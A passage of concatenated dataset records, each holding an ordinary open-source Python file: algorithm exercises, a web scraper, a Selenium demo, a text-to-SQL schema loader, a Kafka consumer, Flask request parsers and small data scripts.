# all the len(S_) - 1 combinations and looking at their\n # possible extensions to cover the extra vertice.\n for i in S:\n if i == 0:\n continue\n for j in S:\n if j == i:\n continue\n for z in range(len(S)-1, 0, -1):\n if S[z] == i:\n without_i = S[:z] + S[z+1:]\n current = get_distance(S, i)\n new = get_distance(without_i, j) + graph[j][i]\n #print(S, without_i, j, i, current, new)\n if new < current:\n set_distance(S, i, new)\n\n best_path = [] \n best_ans = INF\n \n # for key in sorted(C.keys(), key=lambda x: len(x)):\n # print(key, C[key])\n\n # If a full set of vertices has been found need to manually\n # check which path back to vertice 1 will give the shortest\n # distance. 
This defines the final vertice in the path.\n for key in C:\n if len(key) == n:\n last_vert = None\n for vert in key:\n distance = get_distance(key, vert) + graph[vert][0]\n if distance < best_ans:\n last_vert = vert\n best_ans = distance\n best_vertices = key\n\n\n # To get the actual path from the set of vertices, basically reverse\n # the steps of the dynamic programming algorithm.\n # No information has been lost.\n best_path = [] \n path_distance = None\n\n def walk_path(remaining, path, distance):\n nonlocal best_path, path_distance\n if len(remaining) == 2:\n best_path = path\n remaining_ = set(remaining)\n remaining_.remove(0)\n path_distance = distance + get_distance(remaining, remaining_.pop())\n return\n\n # Find the vertice in the smaller set that was used\n # to construct a path to path[0].\n remaining_ = set(remaining)\n remaining_.remove(path[0])\n smallest = INF\n path_vertice = None\n for i in remaining_:\n dist = get_distance(remaining_, i)\n if i == 0 or dist == INF:\n continue\n dist_back = graph[i][path[0]] + dist\n if dist_back < smallest:\n smallest = dist_back\n path_vertice = i\n\n assert smallest != INF\n new_path = [path_vertice] + path.copy()\n walk_path(remaining_, new_path, distance + smallest)\n\n if best_ans < INF:\n walk_path(best_vertices, [last_vert, 0], graph[last_vert][0])\n\n # Check path gives the correct distance.\n distance = 0\n if best_ans < INF:\n for i, vert in enumerate(best_path[:-1]):\n distance += graph[vert][best_path[i+1]]\n distance += graph[best_path[-1]][best_path[0]]\n assert distance == best_ans, 'path shows a distance of {0}, but answer was {1}'.format(\n distance, best_ans)\n\n return (best_ans, [x + 1 for x in best_path])\n\nif __name__ == '__main__':\n data = read_data()\n print_answer(*optimal_path(data))\n","repo_name":"mcgaw/psychic-garbanzo","sub_path":"5/week4/school_bus/school_bus.py","file_name":"school_bus.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28849540234","text":"import copy\nN,K,C = list(map(int, input().split()))\nS = list(input())\nmae = [0]*K\nushiro = [0]*K\nhi = 0\nyouso = 0\n\nwhile True:\n if S[hi] == 'o':\n mae[youso] = hi+1\n youso += 1\n if youso == K:\n break\n hi += C\n hi += 1\n\nhi = N-1\nyouso = 0\n\nwhile True:\n if S[hi] == 'o':\n ushiro[youso] = hi+1\n youso += 1\n if youso == K:\n break\n hi -= C\n hi -= 1\nushiro.reverse()\n\nfor j in range(len(mae)):\n if mae[j] == ushiro[j]:\n print(mae[j])\n\n\n\n\n\n\n\n\n\n","repo_name":"kentahoriuchi/Atcorder","sub_path":"ABC161/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7569388617","text":"# -*- coding:utf-8 -*-\n# /usr/bin/env python\n\"\"\"\nDate: 2021/9/2 22:26\nDesc: 通用数据获取(各种来源)\n\"\"\"\nimport requests\nimport pandas as pd\nfrom io import BytesIO\n\n\ndef index_stock_cons_csindex(index: str = \"000300\") -> pd.DataFrame:\n \"\"\"\n 最新股票指数的成份股目录-中证指数网站\n http://www.csindex.com.cn/zh-CN/indices/index-detail/000300\n :param index: 指数代码, 可以通过 index_stock_info 函数获取\n :type index: str\n :return: 最新股票指数的成份股目录\n :rtype: pandas.DataFrame\n \"\"\"\n url = f\"https://csi-web-dev.oss-cn-shanghai-finance-1-pub.aliyuncs.com/static/html/csindex/public/uploads/file/autofile/cons/{index}cons.xls\"\n r = requests.get(url)\n temp_df = pd.read_excel(BytesIO(r.content))\n if '沪市代码Constituent Code SHH' in temp_df.columns and 
'沪市名称Constituent Name SHH' in temp_df.columns:\n temp_df = temp_df[['沪市代码Constituent Code SHH', '沪市名称Constituent Name SHH']]\n elif '成分券代码Constituent Code' in temp_df.columns and '成分券名称Constituent Name' in temp_df.columns:\n temp_df = temp_df[['成分券代码Constituent Code', '成分券名称Constituent Name']]\n temp_df.columns = [\"代码\", \"名称\"]\n temp_df['代码'] = temp_df['代码'].astype(str).str.zfill(6)\n temp_df.dropna(inplace=True)\n return temp_df\n","repo_name":"zhangjf666/trading","sub_path":"trading/api/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"8179569393","text":"\"\"\"\nUtility functions for reading the standardised text2sql datasets presented in\n`\"Improving Text to SQL Evaluation Methodology\" <https://arxiv.org/abs/1806.09029>`_\n\"\"\"\nimport json\nimport os\nimport sqlite3\nfrom collections import defaultdict\nfrom typing import List, Dict, Optional\n\nfrom allennlp.common import JsonDict\n\n\nclass TableColumn:\n \"\"\"\n Representing the column of table\n \"\"\"\n def __init__(self,\n name: str,\n text: str,\n column_type: str,\n is_primary_key: bool,\n refer_table,\n foreign_key: Optional[List[str]]):\n self.name = name\n self.text = text\n self.column_type = column_type\n self.is_primary_key = is_primary_key\n self.foreign_key = foreign_key\n self.refer_table = refer_table\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass Table:\n \"\"\"\n Representing the table\n \"\"\"\n def __init__(self,\n name: str,\n text: str,\n columns: List[TableColumn]):\n self.name = name\n self.text = text\n self.columns = columns\n\n\ndef read_dataset_schema(schema_path: str):\n \"\"\"\n Reading all table from `schema_path`.\n :param schema_path: default from `tables.json` of sparc data folder.\n :return:\n \"\"\"\n schemas: Dict[str, Dict[str, Table]] = defaultdict(dict)\n schema_id_to_table: Dict[str, Dict[int, Table]] = defaultdict(dict)\n schema_id_to_col: Dict[str, Dict[int, TableColumn]] = defaultdict(dict)\n\n dbs_json_blob = json.load(open(schema_path, \"r\"))\n for db in dbs_json_blob:\n db_id = db['db_id']\n\n column_id_to_table = {}\n column_id_to_column = {}\n\n for i, (column, text, column_type) in enumerate(zip(db['column_names_original'],\n db['column_names'],\n db['column_types'])):\n table_id, column_name = column\n _, column_text = text\n\n table_name = db['table_names_original'][table_id]\n\n if table_name not in schemas[db_id]:\n table_text = db['table_names'][table_id]\n table_obj = Table(table_name, table_text, [])\n schemas[db_id][table_name] = table_obj\n\n # TODO: we cannot add an extra command to handle * problem.\n # we now use a special embedding for linking * and predicting action\n # if column_name == '*':\n # continue\n\n table_obj = schemas[db_id][table_name]\n\n if column_name == \"*\":\n is_primary_key = False\n else:\n is_primary_key = i in db['primary_keys']\n # allocate new column object\n column_obj = TableColumn(column_name.lower(), column_text, column_type,\n is_primary_key, table_obj, None)\n schemas[db_id][table_name].columns.append(column_obj)\n column_id_to_column[i] = column_obj\n\n for (c1, c2) in db['foreign_keys']:\n foreign_key = column_id_to_column[c2].refer_table.name + ':' + column_id_to_column[c2].name\n\n # TODO: we able multiple foreign keys existing to allow the shortcut join\n if column_id_to_column[c1].foreign_key is None:\n column_id_to_column[c1].foreign_key = []\n\n 
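# each foreign-key entry is stored as 'table:column' (built above from the referenced table and column)\n            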
column_id_to_column[c1].foreign_key.append(foreign_key)\n\n for i, table_name in enumerate(db['table_names_original']):\n column_id_to_table[i] = schemas[db_id][table_name]\n\n # assign id to column and id to table\n schema_id_to_table[db_id] = column_id_to_table\n schema_id_to_col[db_id] = column_id_to_column\n return {**schemas}, {**schema_id_to_col}, {**schema_id_to_table}\n\n\ndef read_dataset_values(db_id: str, dataset_path: str, tables: List[str]):\n db = os.path.join(dataset_path, db_id, db_id + \".sqlite\")\n try:\n conn = sqlite3.connect(db)\n except Exception as e:\n raise Exception(f\"Can't connect to SQL: {e} in path {db}\")\n conn.text_factory = str\n cursor = conn.cursor()\n\n values = {}\n\n for table in tables:\n try:\n cursor.execute(f\"SELECT * FROM {table.name} LIMIT 5000\")\n values[table] = cursor.fetchall()\n except:\n conn.text_factory = lambda x: str(x, 'latin1')\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM {table.name} LIMIT 5000\")\n values[table] = cursor.fetchall()\n\n return values\n\n\ndef ent_key_to_name(key):\n parts = key.split(':')\n if parts[0] == 'table':\n return parts[1]\n elif parts[0] == 'column':\n _, _, table_name, column_name = parts\n return f'{table_name}@{column_name}'\n else:\n return parts[1]\n\n\ndef fix_number_value(ex: JsonDict):\n \"\"\"\n There is something weird in the dataset files - the `query_toks_no_value` field anonymizes all values,\n which is good since the evaluator doesn't check for the values. But it also anonymizes numbers that\n should not be anonymized: e.g. LIMIT 3 becomes LIMIT 'value', while the evaluator fails if it is not a number.\n \"\"\"\n\n def split_and_keep(s, sep):\n if not s: return [''] # consistent with string.split()\n\n # Find replacement character that is not used in string\n # i.e. just use the highest available character plus one\n # Note: This fails if ord(max(s)) = 0x10FFFF (ValueError)\n p = chr(ord(max(s)) + 1)\n\n return s.replace(sep, p + sep + p).split(p)\n\n # input is tokenized in different ways... 
so first try to make splits equal\n query_toks = ex['query_toks']\n ex['query_toks'] = []\n for q in query_toks:\n ex['query_toks'] += split_and_keep(q, '.')\n\n i_val, i_no_val = 0, 0\n while i_val < len(ex['query_toks']) and i_no_val < len(ex['query_toks_no_value']):\n if ex['query_toks_no_value'][i_no_val] != 'value':\n i_val += 1\n i_no_val += 1\n continue\n\n i_val_end = i_val\n while i_val + 1 < len(ex['query_toks']) and \\\n i_no_val + 1 < len(ex['query_toks_no_value']) and \\\n ex['query_toks'][i_val_end + 1].lower() != ex['query_toks_no_value'][i_no_val + 1].lower():\n i_val_end += 1\n\n if i_val == i_val_end and ex['query_toks'][i_val] in [\"1\", \"2\", \"3\"] and ex['query_toks'][i_val - 1].lower() == \"limit\":\n ex['query_toks_no_value'][i_no_val] = ex['query_toks'][i_val]\n i_val = i_val_end\n\n i_val += 1\n i_no_val += 1\n\n return ex\n","repo_name":"microsoft/ContextualSP","sub_path":"interactive_text_to_sql/src/context/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"23383605408","text":"import math\n\nt = int(input())\nfor _ in range(t):\n N, K, S = map(int, input().split())\n\n choc_req = K*S\n days_req = math.ceil(choc_req/N)\n days_last = S - (S//7)\n\n if days_req <= days_last:\n print(days_req)\n else:\n print(-1)","repo_name":"kaushal-py/competitive","sub_path":"2018/January Cook off/SURVIVE.py","file_name":"SURVIVE.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42758650696","text":"import requests\nfrom bs4 import BeautifulSoup # bs4 to import beautiful soup 4\nimport pprint # pprint = pretty print is a built-in module to print in a nicer way (more spaces, etc)\n \n\ndef sort_stories_by_votes(hnlist):\n return sorted(hnlist, key= lambda k : k['votes'], reverse=True) # sort the hn list by the votes key,\n # and reverse so it's > to <\n\n\nhn = []\n\n\ndef hn_data(page_number):\n res = requests.get('https://news.ycombinator.com/news?p=' + str(page_number))\n soup = BeautifulSoup(res.text, 'html.parser')\n links = soup.select('.titlelink')\n subtext = soup.select('.subtext') # grab the subtext (the scores are inside the subtext) bc all articles\n # have a subtext, but not all have votes. then we'll grab the scores from there\n\n def create_custom_hn(links, subtext):\n for index, item in enumerate(links):\n title = links[index].getText() # getText so that we get the text and not the html\n href = links[index].get('href', None) # get href=... it's the link. None is the default value\n vote = subtext[index].select('.score') # grab the score from the subtext and returns it in a\n # one-item list. 
that's why later we have to use \n # vote[0], bc we need the text, not the list.\n\n if len(vote): # if it has any votes (!= 0)\n points = int(vote[0].getText().replace(' points', '')) # replace points with an empty string\n if points >= 100: # so that we get relevant articles\n hn.append({'title': title, 'link': href, 'votes': points}) # appends dicts into the list\n return hn \n return create_custom_hn(links, subtext)\n\n\n\nfor x in range(1, 3):\n hn_data(x) # runs the function twice so now hn contains info from page 1 and 2\n\n\npprint.pprint(sort_stories_by_votes(hn)) # sorts the new hn list while using pretty print\n","repo_name":"candebarcelo/python-scripts","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19196706664","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\n\ndriver = webdriver.Chrome()\n\ndriver.get(\"https://jqueryui.com/resources/demos/droppable/default.html\")\n\nvar1 = driver.find_element_by_xpath(\"//p[contains(text(),'Drag me to my target')]\")\nvar2 = driver.find_element_by_xpath(\"//div[@id='droppable']\")\n\nvar3 = ActionChains(driver)\n\n#var3.drag_and_drop(var1, var2).perform()\n\n#interview Question : other way click and hold and move to element\nvar3.click_and_hold(var1).move_to_element(var2).perform()","repo_name":"sandeepbhutkar/SeleniumPython-and-RobotFramework-Multiple-Projects","sub_path":"SeleniumWithPython_2/12DragDropActionChain.py","file_name":"12DragDropActionChain.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1296814341","text":"import csv\nimport sys\n\n# cmd argument 1: folder to process\nfolder = sys.argv[1]\n\ndata = {}\nnames = []\npreamble = \"Lib\"\n\nwith open(folder + \"/bench.csv\", \"rt\", encoding=\"utf8\") as benchfile:\n reader = csv.reader(benchfile)\n\n line_nr = 0\n for line in reader:\n if line_nr == 0:\n line_nr += 1\n continue\n [bench_type, bench_name, bench_n] = line[0].split(\"/\", 2)\n bench_mean = line[1]\n bench_mean_lb = line[2]\n bench_mean_ub = line[3]\n data.setdefault(bench_type, {}).setdefault(bench_name, (bench_mean,bench_mean_lb,bench_mean_ub))\n\n if bench_name not in names:\n names.append(bench_name)\n preamble += \" \" + bench_name + \" min max\"\n line_nr += 1\n\n# print(\"names - \" + str(names))\n# print(preamble)\n\nfile = open(folder + \"/results.tmp\", \"w\")\nfile.write(preamble + \"\\n\")\n\nfor bench_type in data.keys():\n # print(\"type - \" + bench_type)\n\n line = bench_type\n for bench_name in data[bench_type].keys():\n (bench_mean, bench_mean_lb, bench_mean_ub) = data[bench_type][bench_name]\n line += \" \" + bench_mean + \" \" + bench_mean_lb + \" \" + bench_mean_ub\n \n # print(\"line - \" + line)\n file.write(line + \"\\n\")\n\nfile.close()\n","repo_name":"rubenpieters/orth-pipes-bench","sub_path":"scripts/transform_micro.py","file_name":"transform_micro.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73362820532","text":"import joblib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom imblearn.over_sampling import SMOTE\r\nfrom imblearn.pipeline import Pipeline\r\nfrom imblearn.under_sampling import RandomUnderSampler\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import 
metrics\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.feature_selection import SelectKBest, f_classif\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.model_selection import train_test_split, RepeatedStratifiedKFold, RandomizedSearchCV\r\n\r\n\r\ndef plot_confusion_matrix(y_test, model_test):\r\n    cm = metrics.confusion_matrix(y_test, model_test)\r\n    plt.figure(1)\r\n    plt.clf()\r\n    plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)\r\n    classNames = ['Low', 'High']\r\n    plt.title('Confusion Matrix')\r\n    plt.ylabel('True label')\r\n    plt.xlabel('Predicted label')\r\n    tick_marks = np.arange(len(classNames))\r\n    plt.xticks(tick_marks, classNames)\r\n    plt.yticks(tick_marks, classNames)\r\n    s = [['TN', 'FP'], ['FN', 'TP']]\r\n    for i in range(2):\r\n        for j in range(2):\r\n            plt.text(j, i, str(s[i][j]) + \" = \" + str(cm[i][j]))\r\n    plt.savefig('ConfusionMatrix.png', bbox_inches='tight')\r\n    print(\"\\nConfusion Matrix: \", cm)\r\n    total = sum(sum(cm))\r\n    specificity = cm[0, 0]/(cm[0, 0]+cm[0, 1])\r\n    sensitivity = cm[1, 1] / (cm[1, 0] + cm[1, 1])\r\n    print(\"\\nSensitivity: \", sensitivity)\r\n    print(\"\\nSpecificity: \", specificity)\r\n    plt.show()\r\n\r\n\r\ndef report_performance(model):\r\n    model_test = model.predict(X)\r\n    print(\"\\n\\nClassification Report: \")\r\n    print(metrics.classification_report(y, model_test))\r\n    plot_confusion_matrix(y, model_test)\r\n\r\n\r\ndef roc_curves(model):\r\n    predictions_test = model.predict(X)\r\n    fpr, tpr, thresholds = roc_curve(y, predictions_test)  # roc_curve expects (y_true, y_score)\r\n    roc_auc = auc(fpr, tpr)\r\n    print('AUROC = %.6f' % metrics.auc(fpr, tpr))\r\n    plt.figure(2)\r\n    plt.plot(fpr, tpr, color='darkorange', lw=1, label='ROC curve (area = %0.2f)' % roc_auc)\r\n    plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\r\n    plt.xlim([0.0, 1.0])\r\n    plt.ylim([0.0, 1.05])\r\n    plt.xlabel('False Positive Rate')\r\n    plt.ylabel('True Positive Rate')\r\n    plt.title('Receiver operating characteristic')\r\n    plt.legend(loc=\"lower right\")\r\n    plt.savefig('ROC.png', bbox_inches='tight')\r\n    plt.show()\r\n    y_probabilities = model.predict_proba(X)[:, 1]\r\n    pr, rc, thresholds = metrics.precision_recall_curve(y, y_probabilities)\r\n    plt.plot(pr, rc, color='darkorange')\r\n    plt.xlabel('Precision')\r\n    plt.ylabel('Recall')\r\n    plt.savefig('PRcurve.png', bbox_inches='tight')\r\n    plt.show()\r\n\r\n\r\ndef accuracy(model):\r\n    pred = model.predict(X)\r\n    accu = metrics.accuracy_score(y, pred)\r\n    print(\"\\nAccuracy Of the Model: \", accu, \"\\n\\n\")\r\n\r\n\r\ndata_path = \"./Data/test_preprocessed_trail_data_categorized.csv\"\r\ndata_set = pd.read_csv(data_path)\r\nfeatures = list(data_set.columns)\r\npredicted_class = ['dementia_risk']\r\nfeature_classes = list(set(features) - set(predicted_class))\r\n\r\nX = data_set[feature_classes].values\r\ny = data_set[predicted_class].values\r\n# y = preprocessing.label_binarize(y, classes=[0, 1, 2, 3, 4])\r\nprint(X.shape, y.shape)\r\n\r\n\r\ndef count_freq(x):\r\n    (unique, counts) = np.unique(np.array(x), return_counts=True)\r\n    frequencies = np.asarray((unique, counts)).T\r\n    return frequencies\r\n\r\n\r\nloaded_model = joblib.load(\"random_forest_model.pkl\")\r\ny_pred = 
loaded_model.predict(X)\r\n\r\n\r\nreport_performance(loaded_model)\r\naccuracy(loaded_model)\r\nroc_curves(loaded_model)\r\n\r\n","repo_name":"MaheshkumarSundaram/Dissertation","sub_path":"Testing/test_random_forest_implementation.py","file_name":"test_random_forest_implementation.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22144766436","text":"\"\"\"The API status information consumer.\n\"\"\"\n\nimport logging\n\n\nclass APIStatusKafkaConsumer():\n \"\"\"APIStatusKafkaConsumer is tied to consume single topic given\n as :status_topic.\n\n All parameters are required to be valid objects.\n \"\"\"\n\n def __init__(self, status_topic, kafka_consumer, database_writer):\n assert status_topic is not None\n assert kafka_consumer is not None\n assert database_writer is not None\n self.consumer = kafka_consumer\n self.status_topic = status_topic\n self.consumer.subscribe(self.status_topic)\n self.database_writer = database_writer\n\n def close(self):\n \"\"\"Closes the Kafka consumer and the database writer.\n \"\"\"\n logging.info(\"Closing consumer.\")\n try:\n self.consumer.close()\n self.database_writer.close()\n except Exception:\n logging.warning(\"Consumer close raised an exception.\", exc_info=1)\n logging.info(\"Consumer closed.\")\n\n def consume(self):\n \"\"\"Poll messages instead of using the consumer iterator.\n Using poll gives better control to shutdown after reading\n a batch of messages.\n \"\"\"\n\n topics = self.consumer.poll(timeout_ms=100)\n for topic, messages in topics.items():\n for message in messages:\n logging.debug(\"Topic: %s and value %s\", topic, message.value)\n try:\n self.database_writer.persist(message.value)\n except Exception:\n logging.warning(\"Database writing failed.\", exc_info=1)\n self. 
consumer.commit()\n","repo_name":"jjaakola/bang-a-gong","sub_path":"src/api_status_monitor/consumer/kafkaconsumer.py","file_name":"kafkaconsumer.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8371067970","text":"#!C:\\Users\\user\\AppData\\Local\\Programs\\Python\\Python310\\python.exe\r\nprint(\"content-type: text/html; charset=euc-kr\\n\")\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\nimport cgi, os\r\n\r\nform=cgi.FieldStorage()\r\ndf_mt = pd.read_excel('data/maintask.xlsx')\r\ndf_dt = pd.read_excel('data/date_std.xlsx')\r\ndf_mt.fillna('', inplace=True)\r\n\r\n# Extract only the columns needed for the merge from the date DB\r\ndf_dt2 = df_dt[['DATE', 'WN_SERIAL NO', 'STD_CODE']]\r\n# Create a column for the MMM-DD format and attach it\r\ndf_dt2['unique_date'] = np.nan\r\n\r\n# Build date data in mmm-dd format\r\ni=0\r\nwhile i < len(df_dt2):\r\n x = df_dt2.iloc[i,0].strftime('%b %d, %Y') # fetch the date matching the std code\r\n df_dt2.loc[i,['unique_date']] = x\r\n i+=1\r\n\r\n# Join the date data onto the Main Task DB\r\ndf = pd.merge(df_mt, df_dt2, how='left', left_on='DUE DATE', right_on='DATE')\r\n\r\nurl_id = 'http://127.0.0.1:81/PJT_workstation/index.py?id='\r\ndef make_clickable(url, code):\r\n return '<a href=\"{}\" rel=\"noopener noreferrer\" target=\"_blank\">{}</a>'.format(url, code)\r\n #return f'{url}\" rel=\"noopener noreferrer\" target=\"_blank\">{name}'\r\n\r\ndf['link'] = df.apply(lambda x: make_clickable(url_id+x['TASK_CODE'], x['TASK_CODE']), axis=1)\r\n\r\n\r\n\r\n# Given a wn, build the list of dates\r\ndef get_cols(wn):\r\n cols = []\r\n wn = str(wn)\r\n for i in range(1,8):\r\n a = wn+'_'+str(i)\r\n x = df_dt.loc[df_dt['STD_CODE']==a,['DATE']]\r\n x2 = x.iloc[0,0].strftime('%b %d, %Y')\r\n cols.append(x2)\r\n return cols\r\n\r\n#redirection\r\nprint('Location: index.py')\r\nprint()","repo_name":"howonsun/Python","sub_path":"PJT_workstation/set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38890304088","text":"from flask_restplus import reqparse\nfrom werkzeug.datastructures import FileStorage\n\nget_containers = reqparse.RequestParser()\nget_containers.add_argument('start',type=int,required=True,help='For pagination. 
Current index to start from')\n\ndetect_object = reqparse.RequestParser()\ndetect_object.add_argument('image',type=FileStorage,location='files',required=False,help='file')\ndetect_object.add_argument('container_id',type=str,required=True,help='Container ID')\n\ncheck_for_one = reqparse.RequestParser()\ncheck_for_one.add_argument('container_id',type=str,required=True,help='Container ID')\n\n\nadd_container_two = reqparse.RequestParser()\nadd_container_two.add_argument('is_countable',type=bool,required=True,help='Is the item countable')\nadd_container_two.add_argument('name_item',type=str,required=True,help='Name of item')\nadd_container_two.add_argument('container_id',type=str,required=True,help='Container ID')\n\n\nnew_meal_save = reqparse.RequestParser()\nnew_meal_save.add_argument('image', type=FileStorage, location='files', required=False, help='file')\nnew_meal_save.add_argument('ingredient', type=str, required=True, help='Ingredient')\nnew_meal_save.add_argument('name',type=str,required=True,help='Meal name')\nnew_meal_save.add_argument('cook_time',type=str,required=True,help='Cook time')\n\nget_all_ingredient = reqparse.RequestParser()\nget_all_ingredient.add_argument('meal_id',type=int,required=False,help='Meal ID')\n\nsuggest_meal_list = reqparse.RequestParser()\nsuggest_meal_list.add_argument('people_count',type=int,required=False,help='How many people will eat this meal?')","repo_name":"trustedcoder/smart_container_api","sub_path":"app/main/util/req_parser.py","file_name":"req_parser.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15942594661","text":"#!/usr/bin/python\n\"\"\"Multiline sed is tricky! It's easier to look at character sequences.\n\n\"\"\"\n\nimport sys\nimport re\n\ndef main():\n \"\"\"Parse the files to remove newline and tab characters.\"\"\"\n \n sourcefiles = sys.argv[1]\n localDirectory = sys.argv[2] + \"/\"\n \n # construct a list of files to parse\n file = open(sourcefiles, \"r\")\n lines = file.readlines()\n webpages = []\n for i, line in enumerate(lines):\n line = line.strip()\n webpages.append(localDirectory + line)\n file.close()\n \n for filename in webpages:\n #print \"Parsing file \" + filename\n file = open(filename, \"r\")\n text = file.read()\n file.close()\n # whitespace in the HTML, value is indented\n text = re.sub(r'\\<td class=\\\"cnncol4\\\"\\>\\s+', '<td class=\\\"cnncol4\\\">', text)\n text = text.replace(\"<td class=\\\"cnncol4\\\">\\n\\t\\t\\t\\t\\t\\t\", \"<td class=\\\"cnncol4\\\">\")\n # closing tag is indented\n text = text.replace(\"\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t</td>\", \"</td>\")\n file = open(filename, \"w\")\n file.write(text)\n file.close()\n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mockturtl/fortune500","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2239885470","text":"import ast\nimport os\nimport sys\nfrom typing import Any, List\n\nfrom .source_parsers import direct_invocation, flask_router, webapp2_router\n\n\ndef _get_method_children(expr: Any) -> List[Any]:\n \"\"\"Recursively get potential \"child\" snippets of a snippet method\n\n This method recursively retrieves a list of expressions within\n a method that may represent calls to other snippets. 
This is\n necessary because tests that cover the parent snippet should\n also be considered to (recursively) cover any snippets called\n by the parent snippet itself.\n\n Args:\n expr (ast.AST): a Python expression object\n\n Returns:\n List[ast.AST]: a list of potential child snippet methods\n\n \"\"\"\n results = []\n\n if hasattr(expr, 'id'):\n results.append(expr.id) # Base case\n\n if hasattr(expr, 'body') and isinstance(expr.body, list):\n for sub_expr in expr.body:\n results += _get_method_children(sub_expr)\n\n if hasattr(expr, 'orelse') and isinstance(expr.orelse, list):\n for sub_expr in expr.orelse:\n results += _get_method_children(sub_expr)\n\n if hasattr(expr, 'value'):\n results += _get_method_children(expr.value)\n\n if hasattr(expr, 'func'):\n func_list = expr.func\n if not isinstance(func_list, list):\n # Not all func values are lists!\n func_list = [func_list]\n\n for func in func_list:\n results += _get_method_children(func)\n if hasattr(func, 'args'):\n for arg in func.args:\n results += _get_method_children(arg)\n\n return results\n\n\ndef _get_ending_line(expr: Any) -> int:\n \"\"\"Get the ending line number of a Python expression\n\n This method gets the final line number of a\n (possibly-multiline) Python expression.\n\n Args:\n expr (ast.AST): a Python expression object\n\n Returns:\n int: the line number on which the given expression ends\n \"\"\"\n final_stmt = expr\n highest_line_no = -1\n not_at_end = True\n while not_at_end:\n if hasattr(final_stmt, 'lineno'):\n highest_line_no = final_stmt.lineno\n\n body_is_valid = hasattr(final_stmt, 'body') and final_stmt.body\n if hasattr(final_stmt, 'orelse') and final_stmt.orelse:\n # 'orelse' should take priority over 'body'\n # (as it always has a lower ending line)\n final_stmt = final_stmt.orelse\n if isinstance(final_stmt, list):\n # .orelse may or may not be a list\n final_stmt = final_stmt[-1]\n elif body_is_valid and isinstance(final_stmt.body, list):\n final_stmt = final_stmt.body[-1]\n elif body_is_valid:\n final_stmt = final_stmt.body\n elif hasattr(final_stmt, 'exc'):\n final_stmt = final_stmt.exc\n elif hasattr(final_stmt, 'args') and final_stmt.args:\n final_stmt = final_stmt.args[-1]\n elif hasattr(final_stmt, 'elts') and final_stmt.elts:\n final_stmt = final_stmt.elts[-1]\n elif hasattr(final_stmt, 'generators') and final_stmt.generators:\n final_stmt = final_stmt.generators[-1]\n elif hasattr(final_stmt, 'iter'):\n final_stmt = final_stmt.iter\n elif hasattr(final_stmt, 'values') and final_stmt.values:\n final_stmt = final_stmt.values[-1]\n elif hasattr(final_stmt, 'value'):\n # some (but not all) value attributes have\n # child elements - we handle both kinds here\n final_stmt = final_stmt.value\n else:\n not_at_end = False\n\n return highest_line_no\n\n\ndef get_top_level_methods(source_path: str) -> List[Any]:\n \"\"\"Gets the top-level methods within a file\n\n Args:\n source_path: path to the file to process\n\n Returns:\n List[ast.AST]: a list of the top-level\n methods within the provided file\n \"\"\"\n try:\n with open(source_path, 'r') as f:\n content = ''.join(f.readlines())\n nodes = list(ast.iter_child_nodes(ast.parse(content)))\n\n # Webapp2 is the only parser that detects class names explicitly\n # Other parsers use the module name (filename minus \".py\" suffix)\n module_name = os.path.splitext(\n os.path.basename(source_path))[0]\n\n methods = []\n\n methods += webapp2_router.parse(nodes)\n methods += flask_router.parse(nodes, module_name)\n\n # run direct_invocation parser after 
